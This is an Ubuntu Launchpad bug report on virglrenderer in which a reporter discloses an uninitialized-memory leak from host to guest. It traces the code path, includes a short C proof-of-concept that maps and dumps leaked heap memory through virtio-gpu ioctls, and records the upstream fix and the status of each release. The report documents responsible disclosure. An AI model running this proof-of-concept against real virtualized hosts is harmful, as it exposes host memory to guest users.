Ubuntu
virglrenderer package

information leak from host to guest in the virglrenderer

  1. Bionic (18.04)
  2. Bug #1950784
Bug #1950784 reported by Jun Yao
258
This bug affects 1 person
Affects Status Importance Assigned to Milestone
virglrenderer (Ubuntu)
Fix Released
Undecided
Unassigned
Bionic
Triaged
Undecided
Unassigned
Focal
Fix Released
Undecided
Unassigned
Impish
Fix Released
Undecided
Unassigned

Bug Description

Env
===
  Description: Ubuntu 20.04.3 LTS
  Release: 20.04

Package
=======
  virglrenderer_0.8.2

Vulnerability
=============
  The gr->ptr is allocated without initialization at the vrend_renderer_resource_create(). The code path is as following:

virtio_gpu_virgl_process_cmd()
|
|-> virgl_cmd_create_resource_3d()
    |
    |-> virgl_renderer_resource_create()
        |
        |-> vrend_renderer_resource_create()
            |
            | if(args->target == PIPE_BUFFER && args->bind == VIRGL_BIND_CUSTOM) {
            | gr->storage_bits |= VREND_STORAGE_HOST_SYSTEM_MEMORY;
            | gr->ptr = malloc(args->width); // -- Here ---
            | }

The memory pointed by the gr->ptr can be read from the guest kernel. And the code path is as following:

virtio_gpu_virgl_process_cmd()
|
|-> virgl_resource_attach_backing()
    |
    |-> virgl_renderer_resource_attach_iov()
        |
        |-> vrend_renderer_resource_attach_iov()
            |
            | res = vrend_resource_lookup(res_handle, 0);
            | res->iov = iov;
            | res->num_iovs = num_iovs;
            | vrend_write_to_iovec(res->iov, res->num_iovs, 0,
            | res->ptr, res->base.width0); // -- Here ---

However, the memory holding the data can be mmapped to the guest usersapce process. And we can leak lots data as the size of the heap(args->width) is controlled by user.

The PoC is as following:

  dev = open(VIRTIO_GPU, O_RDONLY);
  ioctl(dev, DRM_IOCTL_VIRTGPU_RESOURCE_CREATE, &resource);
  ioctl(dev, DRM_IOCTL_VIRTGPU_MAP, &vmap);
  ptr = mmap(0, MAP_SZ, PROT_READ, MAP_SHARED, dev, vmap.offset);
  for (i = 0; i < WIDTH/sizeof(*ptr); i++)
      LOG("leak: ptr[%d]=%#lx\n", i, ptr[i]);

CVE References

Revision history for this message
Marc Deslauriers (mdeslaur) wrote :

Hi,

Have you reported this issue to the virglrenderer developers?

If not, please report it to them. The bug tracker is here:

https://gitlab.freedesktop.org/virgl/virglrenderer/-/issues

Once you have done that, please let us know the bug number and once a fix is available we will package it for Ubuntu.

Thanks!

Revision history for this message
Jun Yao (2freeman) wrote :

Hi,

The bug number is https://gitlab.freedesktop.org/virgl/virglrenderer/-/issues/249.

Thanks,
Jun Yao

Revision history for this message
Jun Yao (2freeman) wrote :

Hi,

This problem is fixed at https://gitlab.freedesktop.org/virgl/virglrenderer/-/commit/b05bb61f454eeb8a85164c8a31510aeb9d79129c

Thanks,
Jun Yao

Revision history for this message
Steve Beattie (sbeattie) wrote (last edit ):

This was fixed in https://ubuntu.com/security/notices/USN-5309-1 for focal and newer; it is unfixed in bionic where virglrenderer is community maintained.

Changed in virglrenderer (Ubuntu Bionic):
status: New → Triaged
Changed in virglrenderer (Ubuntu):
status: New → Fix Released
Changed in virglrenderer (Ubuntu Focal):
status: New → Fix Released
Changed in virglrenderer (Ubuntu Impish):
status: New → Fix Released
information type: Private Security → Public Security
Steve Beattie (sbeattie)
tags: added: community-security
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.
Subscribing...

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.